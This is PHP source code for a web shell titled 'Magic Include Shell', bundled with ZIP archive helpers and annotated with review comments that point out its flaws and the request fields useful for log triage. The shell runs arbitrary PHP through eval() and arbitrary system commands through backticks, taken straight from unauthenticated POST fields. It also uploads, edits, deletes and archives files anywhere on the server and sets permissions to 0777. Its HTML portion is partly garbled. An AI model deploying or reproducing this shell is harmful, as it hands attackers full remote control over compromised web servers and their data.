> 1); } // closes a method whose beginning lies before this excerpt

    /**
     * Append a directory entry named $name to the archive being built.
     *
     * A local header is pushed onto $this->datasec and a matching
     * central-directory record onto $this->ctrl_dir.
     */
    function addDir($name) {
        $name = str_replace("\\", "/", $name);
        $fr = "\x50\x4b\x03\x04";
        $fr .= "\x0a\x00";
        $fr .= "\x00\x00";
        $fr .= "\x00\x00";
        $fr .= "\x00\x00\x00\x00";
        $fr .= pack("V",0);
        $fr .= pack("V",0);
        $fr .= pack("V",0);
        $fr .= pack("v", strlen($name) );
        $fr .= pack("v", 0 );
        $fr .= $name;
        // NOTE(review): $crc, $c_len and $unc_len are not assigned anywhere in
        // this method, so the next three pack() calls read undefined variables.
        $fr .= pack("V",$crc);
        $fr .= pack("V",$c_len);
        $fr .= pack("V",$unc_len);
        $this -> datasec[] = $fr;
        // Offset is recomputed by joining every section written so far.
        $new_offset = strlen(implode("", $this->datasec));
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .="\x00\x00";
        $cdrec .="\x0a\x00";
        $cdrec .="\x00\x00";
        $cdrec .="\x00\x00";
        $cdrec .="\x00\x00\x00\x00";
        $cdrec .= pack("V",0);
        $cdrec .= pack("V",0);
        $cdrec .= pack("V",0);
        $cdrec .= pack("v", strlen($name) );
        $cdrec .= pack("v", 0 );
        $cdrec .= pack("v", 0 );
        $cdrec .= pack("v", 0 );
        $cdrec .= pack("v", 0 );
        // NOTE(review): $ext is assigned twice and never used in this method.
        $ext = "\x00\x00\x10\x00";
        $ext = "\xff\xff\xff\xff";
        $cdrec .= pack("V", 16 );
        $cdrec .= pack("V", $this -> old_offset );
        $this -> old_offset = $new_offset;
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }

    /**
     * Compress $data and append it to the archive as a file entry named $name.
     *
     * $time is handed to $this->unix2DosTime(), which is defined outside this
     * excerpt.
     */
    function addFile($data, $name, $time = 0) {
        $name = str_replace('\\', '/', $name);
        // Textual strip only, not a path canonicalisation: do not treat the
        // resulting entry name as validated.
        $name = str_replace(array('../','./'), '', $name);
        $dtime = dechex($this->unix2DosTime($time));
        // Indexes 0..7 are read, so this assumes dechex() returned 8 digits.
        $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
        // NOTE(review): eval() is used only to turn the "\xNN" text into four
        // bytes. The evaluated text is built from dechex() output, but the call
        // still trips eval-based scanners; pack('V', ...) on the integer would
        // give the same little-endian bytes without eval.
        eval('$hexdtime = "' . $hexdtime . '";');
        $fr = "\x50\x4b\x03\x04";
        $fr .= "\x14\x00";
        $fr .= "\x00\x00";
        $fr .= "\x08\x00";
        $fr .= $hexdtime;
        $unc_len = strlen($data);
        $crc = crc32($data);
        $zdata = gzcompress($data);
        // Drop the first 2 and last 4 bytes of the gzcompress() output (the
        // zlib wrapper) so that only the raw deflate stream is stored.
        $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
        $c_len = strlen($zdata);
        $fr .= pack('V', $crc);
        $fr .= pack('V', $c_len);
        $fr .= pack('V', $unc_len);
        $fr .= pack('v', strlen($name));
        $fr .= pack('v', 0);
        $fr .= $name;
        $fr .= $zdata;
        // CRC and both sizes are written a second time after the data.
        $fr .= pack('V', $crc);
        $fr .= pack('V', $c_len);
        $fr .= pack('V', $unc_len);
        $this -> datasec[] = $fr;
        $cdrec = "\x50\x4b\x01\x02";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x14\x00";
        $cdrec .= "\x00\x00";
        $cdrec .= "\x08\x00";
        $cdrec .= $hexdtime;
        $cdrec .= pack('V', $crc);
        $cdrec .= pack('V', $c_len);
        $cdrec .= pack('V', $unc_len);
        $cdrec .= pack('v', strlen($name) );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('v', 0 );
        $cdrec .= pack('V', 32 );
        $cdrec .= pack('V', $this -> old_offset );
        $this -> old_offset += strlen($fr);
        $cdrec .= $name;
        $this -> ctrl_dir[] = $cdrec;
    }

    /**
     * Return the finished archive as one string: all entry sections, the
     * central directory, then the end-of-central-directory record.
     */
    function file() {
        $data = implode('', $this -> datasec);
        $ctrldir = implode('', $this -> ctrl_dir);
        return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
    }

    /**
     * Add every regular file in $files to the archive, using the path itself
     * as the entry name. Paths that are not regular files are skipped.
     */
    function addFiles($files) {
        foreach($files as $file) {
            if (is_file($file)) {
                // file() here is PHP's global function, not the method above.
                $data = implode("",file($file));
                $this->addFile($data,$file);
            }
        }
    }

    /**
     * Write the archive to the path $file.
     * NOTE(review): the fopen() result is not checked before fwrite()/fclose().
     */
    function output($file) {
        $fp=fopen($file,"w");
        fwrite($fp,$this->file());
        fclose($fp);
    }
} // end of the archive-writer class; its header lies before this excerpt

/**
 * Minimal in-memory ZIP reader: ReadFile() loads a whole archive and fills
 * $Entries with one SimpleUnzipEntry per file entry.
 */
class SimpleUnzip {
    var $Comment = '';
    var $Entries = array();
    var $Name = '';
    var $Size = 0;
    var $Time = 0;

    // Old-style constructor (method named after the class). PHP 8 no longer
    // treats such a method as a constructor, so ReadFile() would not run on
    // `new SimpleUnzip($file)` there.
    function SimpleUnzip($in_FileName = '') {
        if ($in_FileName !== '') {
            SimpleUnzip::ReadFile($in_FileName);
        }
    }

    // Number of entries parsed by the last ReadFile() call.
    function Count() {
        return count($this->Entries);
    }

    // The accessors below index $this->Entries directly, with no bounds check.
    function GetData($in_Index) {
        return $this->Entries[$in_Index]->Data;
    }
    function GetEntry($in_Index) {
        return $this->Entries[$in_Index];
    }
    function GetError($in_Index) {
        return $this->Entries[$in_Index]->Error;
    }
    function GetErrorMsg($in_Index) {
        return $this->Entries[$in_Index]->ErrorMsg;
    }
    function GetName($in_Index) {
        return $this->Entries[$in_Index]->Name;
    }
    function GetPath($in_Index) {
        return $this->Entries[$in_Index]->Path;
    }
    function GetTime($in_Index) {
        return $this->Entries[$in_Index]->Time;
    }

    /**
     * Read the archive at $in_FileName fully into memory and parse it.
     *
     * Sets $Name, $Time, $Size and $Comment, rebuilds $Entries and returns it.
     * Per-entry problems are recorded as an error code and message on the
     * entry (1 size mismatch, 2 decompression failed, 3 uncompressed size
     * mismatch, 4 CRC mismatch, 5 encrypted, 6 unsupported method, 7 bz2
     * missing); nothing is thrown.
     *
     * NOTE(review): records are located by splitting the raw bytes on the
     * signature strings, so signature bytes occurring inside entry data also
     * split. Decompression has no output limit, and the fopen()/fread()
     * results are not checked.
     */
    function ReadFile($in_FileName) {
        $this->Entries = array();
        $this->Name = $in_FileName;
        $this->Time = filemtime($in_FileName);
        $this->Size = filesize($in_FileName);
        $oF = fopen($in_FileName, 'rb');
        $vZ = fread($oF, $this->Size);
        fclose($oF);
        // $aE[1] is used without checking that the end-of-central-directory
        // signature was found at all.
        $aE = explode("\x50\x4b\x05\x06", $vZ);
        $aP = unpack('x16/v1CL', $aE[1]);
        $this->Comment = substr($aE[1], 18, $aP['CL']);
        $this->Comment = strtr($this->Comment, array("\r\n" => "\n","\r" => "\n"));
        // Keep what precedes the first central-directory signature, then split
        // it on the local-header signature.
        $aE = explode("\x50\x4b\x01\x02", $vZ);
        $aE = explode("\x50\x4b\x03\x04", $aE[0]);
        array_shift($aE);
        foreach ($aE as $vZ) {
            $aI = array();
            $aI['E'] = 0;
            $aI['EM'] = '';
            $aP = unpack('v1VN/v1GPF/v1CM/v1FT/v1FD/V1CRC/V1CS/V1UCS/v1FNL', $vZ);
            // NOTE(review): logical && rather than bitwise &, so any non-zero
            // flag word marks the entry as encrypted (the 0x0008 test below
            // uses &).
            $bE = ($aP['GPF'] && 0x0001) ? TRUE : FALSE;
            $nF = $aP['FNL'];
            if ($aP['GPF'] & 0x0008) {
                // CRC and sizes are taken from the last 12 bytes of the chunk.
                $aP1 = unpack('V1CRC/V1CS/V1UCS', substr($vZ, -12));
                $aP['CRC'] = $aP1['CRC'];
                $aP['CS'] = $aP1['CS'];
                $aP['UCS'] = $aP1['UCS'];
                $vZ = substr($vZ, 0, -12);
            }
            // The name is read at offset 26 and the data at 26 + name length;
            // the two bytes at offset 24 are never read, so presumably a zero
            // extra-field length is assumed.
            $aI['N'] = substr($vZ, 26, $nF);
            if (substr($aI['N'], -1) == '/') {
                // Names ending in '/' (directory entries) are skipped.
                continue;
            }
            // Path and Name come straight from the archive; dirname() and
            // basename() do not remove ".." segments from the path part.
            $aI['P'] = dirname($aI['N']);
            $aI['P'] = $aI['P'] == '.' ? '' : $aI['P'];
            $aI['N'] = basename($aI['N']);
            $vZ = substr($vZ, 26 + $nF);
            if (strlen($vZ) != $aP['CS']) {
                $aI['E'] = 1;
                $aI['EM'] = 'Compressed size is not equal with the value in header information.';
            } else {
                if ($bE) {
                    $aI['E'] = 5;
                    $aI['EM'] = 'File is encrypted, which is not supported from this class.';
                } else {
                    switch($aP['CM']) {
                        case 0:
                            break;
                        case 8:
                            $vZ = gzinflate($vZ);
                            break;
                        case 12:
                            // Tries to load the bz2 extension at run time,
                            // with errors suppressed.
                            if (! extension_loaded('bz2')) {
                                if (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN') {
                                    @dl('php_bz2.dll');
                                } else {
                                    @dl('bz2.so');
                                }
                            }
                            if (extension_loaded('bz2')) {
                                $vZ = bzdecompress($vZ);
                            } else {
                                $aI['E'] = 7;
                                $aI['EM'] = "PHP BZIP2 extension not available.";
                            }
                            break;
                        default:
                            $aI['E'] = 6;
                            $aI['EM'] = "De-/Compression method {$aP['CM']} is not supported.";
                    }
                    if (! $aI['E']) {
                        if ($vZ === FALSE) {
                            $aI['E'] = 2;
                            $aI['EM'] = 'Decompression of data failed.';
                        } else {
                            if (strlen($vZ) != $aP['UCS']) {
                                $aI['E'] = 3;
                                $aI['EM'] = 'Uncompressed size is not equal with the value in header information.';
                            } else {
                                if (crc32($vZ) != $aP['CRC']) {
                                    $aI['E'] = 4;
                                    $aI['EM'] = 'CRC32 checksum is not equal with the value in header information.';
                                }
                            }
                        }
                    }
                }
            }
            // Data is stored on the entry even when an error code was set.
            $aI['D'] = $vZ;
            // Timestamp rebuilt from the FT (time) and FD (date) header words.
            $aI['T'] = mktime(($aP['FT'] & 0xf800) >> 11, ($aP['FT'] & 0x07e0) >> 5, ($aP['FT'] & 0x001f) << 1, ($aP['FD'] & 0x01e0) >> 5, ($aP['FD'] & 0x001f), (($aP['FD'] & 0xfe00) >> 9) + 1980);
            // `= &new` is PHP 4 syntax and is rejected by PHP 7 and later.
            $this->Entries[] = &new SimpleUnzipEntry($aI);
        }
        return $this->Entries;
    }
}

/**
 * One parsed archive entry, copied from the array built in
 * SimpleUnzip::ReadFile().
 */
class SimpleUnzipEntry {
    var $Data = '';
    var $Error = 0;
    var $ErrorMsg = '';
    var $Name = '';
    var $Path = '';
    var $Time = 0;

    // Old-style constructor; copies the D/E/EM/N/P/T keys of $in_Entry.
    function SimpleUnzipEntry($in_Entry) {
        $this->Data = $in_Entry['D'];
        $this->Error = $in_Entry['E'];
        $this->ErrorMsg = $in_Entry['EM'];
        $this->Name = $in_Entry['N'];
        $this->Path = $in_Entry['P'];
        $this->Time = $in_Entry['T'];
    }
}

/**
 * Extract every entry of the archive $filename below $destination_folder.
 *
 * NOTE(review): the entry Path and Name come from the archive and are joined
 * onto the destination with no normalisation or containment check, so ".."
 * segments in an entry name reach mkdir() and fopen() unchanged. The entry's
 * Error field is never consulted, so entries that failed the size or CRC
 * checks are written too. Directories are created with mode 0777 and errors
 * suppressed; the fopen() result is not checked.
 */
function unzipFile($filename, $destination_folder) {
    if (substr($destination_folder, -1) != '/') {
        $destination_folder = $destination_folder .'/';
    }
    $vzip = new SimpleUnzip($filename);
    foreach ($vzip->Entries as $extr) {
        $path = $extr->Path;
        $path_folder = explode ('/', $path);
        $new_path = '';
        // Create each directory level of the entry path in turn.
        foreach ($path_folder as $folder) {
            $new_path .= $folder .'/';
            $to_create = $destination_folder . $new_path;
            if (substr($to_create, -1) == '/') {
                $to_create = substr($to_create, 0, strlen($to_create)-1);
            }
            @mkdir($to_create, 0777);
        }
        $new_path = '';
        $filev = fopen ($destination_folder. $extr->Path .'/'. $extr->Name, 'w');
        fwrite ($filev, $extr->Data);
        fclose ($filev);
    }
}

/**
 * Recursively delete $file (a file or a directory tree), printing one status
 * line per path.
 *
 * Each path is first chmod'ed to 0777. $file is printed into the response
 * without escaping.
 */
function dd($file) {
    if (is_dir($file) || is_file($file)) {
        chmod($file,0777);
        if (is_dir($file)) {
            $handle = opendir($file);
            // NOTE(review): the loop tests the truthiness of readdir(), so it
            // also stops at an entry whose name is falsy (such as "0").
            while($filename = readdir($handle))
                if ($filename != "." && $filename != "..")
                    dd($file."/".$filename);
            closedir($handle);
            if(@rmdir($file)) print "$file deleted!
";
            else print "$file delete error!
";
        } else {
            if(@unlink($file)) print "$file deleted!
";
            else print "$file delete error!
";
        }
    }
}

/**
 * Build a ',:,'-separated string of paths below $file, recursing into
 * directories; for a non-directory the path itself is returned.
 *
 * Every visited path is chmod'ed to 0777. Returns nothing when $file does not
 * exist.
 * NOTE(review): $archive is appended to with .= without being initialised.
 */
function add2zipfile($file) {
    if (file_exists($file)) {
        chmod($file,0777);
        if (is_dir($file)) {
            $handle = opendir($file);
            while($filename = readdir($handle))
                if ($filename != "." && $filename != "..") {
                    $archive.=add2zipfile(rtrim($file,'/').'/'.$filename).',:,';
                    //$archive.=rtrim($file,'/').'/'.$filename.',:,';
                }
            closedir($handle);
            return $archive;
        } else {
            $archive.=$file;
            return $archive;
        }
    }
}

/**
 * Map PHP_SAPI to a display label; SAPI names not listed are returned as-is.
 */
function U_sapi() {
    switch(PHP_SAPI) {
        case 'apache2handler':
            return 'Apache 2.0 Handler';
        case 'apache':
            return 'Apache';
        case 'cgi':
            return 'CGI';
        case 'cgi-fcgi':
            return 'CGI/FastCGI';
        default:
            return PHP_SAPI;
    }
}

/**
 * Return an operating-system description: php_uname() when that function
 * exists, otherwise a label derived from PHP_OS.
 */
function U_getos() {
    if (function_exists('php_uname')) return php_uname();
    if (PHP_OS == 'WINNT') return 'Windows NT';
    return PHP_OS;
}

// ---------------------------------------------------------------------------
// Request prologue of the web shell (titled "Magic Include Shell" in the
// markup below). Every value is copied from $_POST/$_GET into a global with no
// authentication or validation visible in this excerpt. Further down the page
// $comanda is passed to eval() and $shcom to the backtick (shell) operator.
// For triage, the field names worth searching for in request logs are:
//   POST: file2zip, deldira, arhiv, comanda, shcom, filee, uploadfile,
//         uploaddir, del, edit, save_edit
//   GET:  dira, filee, edit
// ereg(), $PHP_SELF and the unquoted array keys ($_POST[del]) suggest the
// sample was written for PHP 4/5; ereg() does not exist in PHP 7 and later.
// ---------------------------------------------------------------------------
$site=$PHP_SELF;
header("Content-type: text/html");
$file2zip=$_POST['file2zip'];
$deldira=$_POST['deldira'];
$arhiv=$_POST['arhiv'];
// Working directory for the listing; defaults to './' and is forced to end
// with '/'.
$dira=$_GET['dira'];
(empty($dira) || !isset($dira)) ? $dira='./' : '';
if(!ereg("/$",$dira)) $dira=$dira.'/';
$comanda=$_POST['comanda'];
$shcom=$_POST['shcom'];
// 'filee' from POST is used as given; from GET it is prefixed with $dira.
if(isset($_POST['filee']) && !empty($_POST['filee'])) $filee=$_POST['filee'];
elseif(isset($_GET['filee']) && !empty($_GET['filee'])) $filee=$dira.''.$_GET['filee'];
$uploadfile=$_POST['uploadfile'];
$uploaddir=$_POST['uploaddir'];
$del=$_POST[del];
if(isset($_POST['edit']) && !empty($_POST['edit'])) $edit=$_POST['edit'];
elseif(isset($_GET['edit']) && !empty($_GET['edit'])) $edit=$_GET['edit'];
$save_edit=$_POST[save_edit];

/**
 * Repeatedly cut $len bytes out of $str, starting at the first occurrence of
 * $sym, until $sym no longer occurs; returns what is left.
 */
function cutter($str,$sym,$len){
    do{
        $serr=1;
        if(strpos($str,$sym)!==false){
            $serr=0;
            $str1 = substr($str,0,strpos($str,$sym));
            $str2 = substr($str,strpos($str,$sym)+$len,strlen($str));
            $str = $str1.$str2;
        }
    } while($serr==0);
    return $str;
}

// Query string with 'dira=' and up to 999 bytes from that point removed, then
// runs of '&&' collapsed to a single '&'.
$kverya=cutter($_SERVER["QUERY_STRING"],'dira=',999);
while(ereg('&&',$kverya)) {
    $kverya=str_replace('&&','&',$kverya);
}
// NOTE(review): $ver, echoed in the title below, is not defined in this excerpt.
?> Magic Include Shell <?php echo $ver; ?>
">
Server: '; print U_sapi(); if(function_exists('apache_get_version')) print ' ['.apache_get_version().']'; print '
'; print '
System: '; print U_getos(); print '

'; print 'Php version: '.PHP_VERSION.'

'; print 'Hostname:Port: '.$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT']; ?>
Php eval:

"> Shell command:

" method="post"> File to upload:

Dir to upload:

addDir($ziparc[$i]); print "{$ziparc[$i]} added!
"; } elseif(is_file($ziparc[$i])) { $name2add=explode('../',$ziparc[$i]); $name2add=$name2add[count($name2add)-1]; $ziper->addFile(file_get_contents($ziparc[$i]),$name2add); print "{$ziparc[$i]} added!
"; } } } } $ziper->output($_POST[zip_path]); } if(!empty($deldira) && is_array($deldira) && isset($_POST[delete_submit])) { for($i=0;$i"; else print "Rename error!
"; } if(!empty($comanda)) { eval(trim(stripslashes($comanda))); } if(!empty($shcom)) { print '
'.`$shcom`.'
'; } if(!empty($_FILES['uploadfile']['name'])) { @copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? print "File ".$_FILES['uploadfile']['name']." uploaded succesfully!
" : print "Upload error!
"; } if(!empty($del) && is_array($del) && isset($_POST[delete_submit])) { for($i=0;$i'.$del[$i].' deleted succesfully!
'; } } if(!empty($filee)) { ?>

"),array('#FFFFFF',''),highlight_string($filee,true));
else
	print $filee;
?>
">
$edit edited succesfully!
"; } print 'Dir='.$dira.'
'; if(!($dp = opendir($dira))) die ("Cannot open ./"); $file_array = array(); while ($file = readdir ($dp)) { $file_array[] = $file; } sort ($file_array); print '
'; while (list($fileIndexValue, $file_name) = each ($file_array)) { if(is_file($dira.''.$file_name)) { echo ""; if(is_writeable($dira.''.$file_name)) { $file_name_array=explode('.',$file_name); $file_name_ext=$file_name_array[count($file_name_array)-1]; echo ""; echo ""; echo ""; } else { echo ""; echo ""; echo ""; } if(is_readable($dira.''.$file_name)) { if($file_name_ext!='zip') echo ""; else echo ""; if($file_name_ext=='zip') echo ""; else echo ""; } else { echo ""; echo ""; } print ''; } else { echo ""; echo ""; $dir_for_del=rtrim($dira,'/').'/'.$file_name; if($file_name!='.' && $file_name!='..' && is_writeable($dir_for_del)) { echo ""; echo ""; } elseif($file_name!='.' && $file_name!='..' && !is_writeable($dir_for_del)) echo ""; if(is_readable($dir_for_del) && $file_name!='.' && $file_name!='..') echo ""; elseif(!is_readable($dir_for_del) && $file_name!='.' && $file_name!='..') echo ""; if($file_name=='.' || $file_name=='..') echo ""; echo ''; } } print '
Name Edit to to to
$file_name (". round(filesize($dira.''.$file_name)/1024,1) . "kb)edit       
$file_name         
'; ?>